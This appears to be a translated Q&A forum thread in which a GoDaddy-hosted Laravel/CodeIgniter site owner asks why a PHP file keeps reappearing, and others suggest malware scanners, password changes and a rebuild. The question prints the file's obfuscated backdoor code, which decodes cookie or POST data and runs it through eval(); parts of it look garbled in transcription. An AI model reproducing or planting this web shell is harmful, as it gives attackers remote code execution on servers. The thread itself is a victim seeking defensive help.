Внедрение файла PHP .. как решить эту проблему?
на моем веб-сайте всегда есть файл, который всегда загружается, хотя я не тот, кто его загружает.
и это код, когда вы его открываете .. есть идеи, как это остановить?
<?php
1.$ilmtik[4] . $ilmtik[26] . $ilmtik[20] . $ilmtik[18] . $ilmtik[12] . $ilmtik[3] . $ilmtik[22] . $ilmtik1 . $ilmtik[5] . $ilmtik[14] . $ilmtik[28] . $ilmtik[5] . $ilmtik[30] . $ilmtik[30] . $ilmtik[4] . $ilmtik[26];
$kkunht[] = $ilmtik[24] . $ilmtik[13];
$kkunht[] = $ilmtik[0];
$kkunht[] = $ilmtik[26] . $ilmtik[17] . $ilmtik[27] . $ilmtik[21] . $ilmtik[32];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[23] . $ilmtik[16] . $ilmtik[3] . $ilmtik[2] . $ilmtik[3] . $ilmtik[6] . $ilmtik[32];
$kkunht[] = $ilmtik[3] . $ilmtik[29] . $ilmtik[2] . $ilmtik[8] . $ilmtik[17] . $ilmtik[12] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[27] . $ilmtik[22] . $ilmtik[10] . $ilmtik[32] . $ilmtik[16];
$kkunht[] = $ilmtik[6] . $ilmtik[16] . $ilmtik[16] . $ilmtik[6] . $ilmtik[25] . $ilmtik[23] . $ilmtik[34] . $ilmtik[3] . $ilmtik[16] . $ilmtik[33] . $ilmtik[3];
$kkunht[] = $ilmtik[10] . $ilmtik[32] . $ilmtik[16] . $ilmtik[8] . $ilmtik[3] . $ilmtik[21];
$kkunht[] = $ilmtik[2] . $ilmtik[6] . $ilmtik[26] . $ilmtik[15];
foreach($kkunht[7]($_COOKIE, $_POST) as $dfmafta => $ozyods) {
function lawlvc($kkunht, $dfmafta, $fanykfj)
{
return $kkunht[6]($kkunht[4]($dfmafta . $kkunht[0], ($fanykfj / $kkunht8) + 1) , 0, $fanykfj);
}
function cuoen($kkunht, $soeasy)
{
return @$kkunht[9]($kkunht1, $soeasy);
}
function mktryk($kkunht, $soeasy)
{
$pcrtw = $kkunht3 % 3;
if (!$pcrtw) {
eval($soeasy1);
exit();
}
}
$ozyods = cuoen($kkunht, $ozyods);
mktryk($kkunht, $kkunht[5]($kkunht[2], $ozyods ^ lawlvc($kkunht, $dfmafta, $kkunht8)));
}
может у кого-то есть идея по этому поводу .. спасибо :(
я уже сделал, не работает .. :(
вы пробовали анализировать этот файл на virustotal.com/#/home/upload
На Godaddy есть два набора паролей: пароль Master Godaddy и пароль для сайта. Вы подтвердили, что изменили пароли САЙТА?
Ответы 1
существует множество сканеров, которые проверят ваш сайт (например, https://sitecheck.sucuri.net/).
Чтобы решить эту проблему, я отключил бы php, отключил доступ по http, затем ssh на сайт и начал бы очистку от вредоносных программ. изменение пароля - неплохая идея, но это не сильно повлияет на бэкдор.
Я уже очищаю сайт, и все равно это происходит ... как обычно ... я также меняю пароль ... я думаю, что это инъекция ... но я не совсем уверен ... я понятия не имею ..
пробовали ли вы какие-либо сканеры (например, упомянутый выше, хотя вы можете осмотреться и найти другие), чтобы узнать, могут ли они определить причину?
Я попробовал сканеры, но, к сожалению, он не может найти вредоносную программу, которая вызывает эту проблему. При сканировании не обнаружено вредоносных программ (низкий риск) Не обнаружено внедренного спама (низкий риск) Не обнаружено искажений (низкий риск)
я бы перестроил сайт с нуля. устанавливайте пакеты по одному, устанавливайте последние исправления безопасности и не устанавливайте пакеты с сомнительной репутацией. возможно, вы даже захотите разместить его где-нибудь еще. какой URL у вашего сайта?
мы уже сделали перестройку сайта, но все еще нет эффекта .. вредоносная программа не влияет на дизайн и функциональность, но когда вы добавляете ее в adwords .. Google не разрешает из-за наличия вредоносной программы .. я продолжаю удаляя этот файл каждый день и каждый день, он будет возвращаться ... я не знаю, что это за вредоносное ПО ... я не знаю, откуда оно взялось ... но когда я смотрю на код, я вижу сеанс и публикую там ... но Я не знаю, что это значит ... может быть, это захват сеанса или cookie, но я не совсем уверен, зачем мне нужно мнение, если у кого-то есть опыт по этому поводу.
в любом случае веб-сайт размещен на godaddy, и его структура - laravel, а другая - codeigniter
Измените пароли на своем сайте?